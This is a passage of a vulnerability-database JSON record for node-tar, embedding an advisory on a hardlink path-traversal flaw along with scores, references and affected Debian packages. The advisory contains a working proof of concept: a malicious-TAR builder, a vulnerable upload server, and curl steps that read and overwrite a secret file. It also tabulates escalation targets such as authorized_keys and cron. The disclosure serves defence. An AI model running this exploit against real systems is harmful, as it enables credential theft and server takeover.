-31802","GHSA-9ppj-qmqm-q256"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qunt-xms1-a3cc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20118?format=json","vulnerability_id":"VCID-xqpk-t1d2-yqak","summary":"node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal\n### Summary\nnode-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.\n\n### Details\nThe vulnerability exists in `lib/unpack.js`. When extracting a hardlink, two functions handle the linkpath differently:\n\n**Security check in `[STRIPABSOLUTEPATH]`:**\n```javascript\nconst entryDir = path.posix.dirname(entry.path);\nconst resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));\nif (resolved.startsWith('../')) { /* block */ }\n```\n\n**Hardlink creation in `[HARDLINK]`:**\n```javascript\nconst linkpath = path.resolve(this.cwd, entry.linkpath);\nfs.linkSync(linkpath, dest);\n```\n\n**Example:** An application extracts a TAR using `tar.extract({ cwd: '/var/app/uploads/' })`. The TAR contains entry `a/b/c/d/x` as a hardlink to `../../../../etc/passwd`.\n\n- **Security check** resolves the linkpath relative to the entry's parent directory: `a/b/c/d/ + ../../../../etc/passwd` = `etc/passwd`. No `../` prefix, so it **passes**.\n\n- **Hardlink creation** resolves the linkpath relative to the extraction directory (`this.cwd`): `/var/app/uploads/ + ../../../../etc/passwd` = `/etc/passwd`. This **escapes** to the system's `/etc/passwd`.\n\nThe security check and hardlink creation use different starting points (entry directory `a/b/c/d/` vs extraction directory `/var/app/uploads/`), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.\n\n### PoC\n#### Setup\n\nCreate a new directory with these files:\n\n```\npoc/\n├── package.json\n├── secret.txt          ← sensitive file (target)\n├── server.js           ← vulnerable server\n├── create-malicious-tar.js\n├── verify.js\n└── uploads/            ← created automatically by server.js\n    └── (extracted files go here)\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"tar\": \"^7.5.0\" } }\n```\n\n**secret.txt** (sensitive file outside uploads/)\n```\nDATABASE_PASSWORD=supersecret123\n```\n\n**server.js** (vulnerable file upload server)\n```javascript\nconst http = require('http');\nconst fs = require('fs');\nconst path = require('path');\nconst tar = require('tar');\n\nconst PORT = 3000;\nconst UPLOAD_DIR = path.join(__dirname, 'uploads');\nfs.mkdirSync(UPLOAD_DIR, { recursive: true });\n\nhttp.createServer((req, res) => {\n  if (req.method === 'POST' && req.url === '/upload') {\n    const chunks = [];\n    req.on('data', c => chunks.push(c));\n    req.on('end', async () => {\n      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));\n      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });\n      res.end('Extracted\\n');\n    });\n  } else if (req.method === 'GET' && req.url === '/read') {\n    // Simulates app serving extracted files (e.g., file download, static assets)\n    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');\n    if (fs.existsSync(targetPath)) {\n      res.end(fs.readFileSync(targetPath));\n    } else {\n      res.end('File not found\\n');\n    }\n  } else if (req.method === 'POST' && req.url === '/write') {\n    // Simulates app writing to extracted file (e.g., config update, log append)\n    const chunks = [];\n    req.on('data', c => chunks.push(c));\n    req.on('end', () => {\n      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');\n      if (fs.existsSync(targetPath)) {\n        fs.writeFileSync(targetPath, Buffer.concat(chunks));\n        res.end('Written\\n');\n      } else {\n        res.end('File not found\\n');\n      }\n    });\n  } else {\n    res.end('POST /upload, GET /read, or POST /write\\n');\n  }\n}).listen(PORT, () => console.log(`http://localhost:${PORT}`));\n```\n\n**create-malicious-tar.js** (attacker creates exploit TAR)\n```javascript\nconst fs = require('fs');\n\nfunction tarHeader(name, type, linkpath = '', size = 0) {\n  const b = Buffer.alloc(512, 0);\n  b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);\n  b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);\n  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);\n  b.write('        ', 148);\n  b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;\n  if (linkpath) b.write(linkpath, 157);\n  b.write('ustar\\x00', 257); b.write('00', 263);\n  let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];\n  b.write(sum.toString(8).padStart(6, '0') + '\\x00 ', 148);\n  return b;\n}\n\n// Hardlink escapes to parent directory's secret.txt\nfs.writeFileSync('malicious.tar', Buffer.concat([\n  tarHeader('d/', 'dir'),\n  tarHeader('d/x', 'link', '../secret.txt'),\n  Buffer.alloc(1024)\n]));\nconsole.log('Created malicious.tar');\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\necho \"DATABASE_PASSWORD=supersecret123\" > secret.txt\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Execute attack\nnode create-malicious-tar.js\ncurl -X POST --data-binary @malicious.tar http://localhost:3000/upload\n\n# READ ATTACK: Steal secret.txt content via the hardlink\ncurl http://localhost:3000/read\n# Returns: DATABASE_PASSWORD=supersecret123\n\n# WRITE ATTACK: Overwrite secret.txt through the hardlink\ncurl -X POST -d \"PWNED\" http://localhost:3000/write\n\n# Confirm secret.txt was modified\ncat secret.txt\n```\n### Impact\n\nAn attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:\n\n**Immediate (Read Attack):** If the application serves extracted files, attacker can read any file readable by the process.\n\n**Conditional (Write Attack):** If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.\n\n### Remote Code Execution / Server Takeover\n\n| Attack Vector | Target File | Result |\n|--------------|-------------|--------|\n| SSH Access | `~/.ssh/authorized_keys` | Direct shell access to server |\n| Cron Backdoor | `/etc/cron.d/*`, `~/.crontab` | Persistent code execution |\n| Shell RC Files | `~/.bashrc`, `~/.profile` | Code execution on user login |\n| Web App Backdoor | Application `.js`, `.php`, `.py` files | Immediate RCE via web requests |\n| Systemd Services | `/etc/systemd/system/*.service` | Code execution on service restart |\n| User Creation | `/etc/passwd` (if running as root) | Add new privileged user |\n\n## Data Exfiltration & Corruption\n\n1. **Overwrite arbitrary files** via hardlink escape + subsequent write operations\n2. **Read sensitive files** by creating hardlinks that point outside extraction directory\n3. **Corrupt databases** and application state\n4. **Steal credentials** from config files, `.env`, secrets","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24842","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04676","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04653","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05812","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05664","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05858","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05849","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0562","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05635","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05672","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05699","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05678","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0567","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0578","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05631","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24842"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/isaacs/node-tar","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar"},{"reference_url":"https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/"}],"url":"https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"},{"reference_url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/"}],"url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24842","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24842"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2433645","reference_id":"2433645","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2433645"},{"reference_url":"https://github.com/advisories/GHSA-34x7-hfp2-rc4v","reference_id":"GHSA-34x7-hfp2-rc4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-34x7-hfp2-rc4v"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2900","reference_id":"RHSA-2026:2900","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2900"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5447","reference_id":"RHSA-2026:5447","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5447"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6192","reference_id":"RHSA-2026:6192","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6192"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932655?format=json","purl":"pkg:deb/debian/node-tar@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932648?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-qunt-xms1-a3cc"},{"vulnerability":"VCID-xqpk-t1d2-yqak"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1088710?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u3%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932646?format=json","purl":"pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932650?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932649?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie"}],"aliases":["CVE-2026-24842","GHSA-34x7-hfp2-rc4v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xqpk-t1d2-yqak"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie"}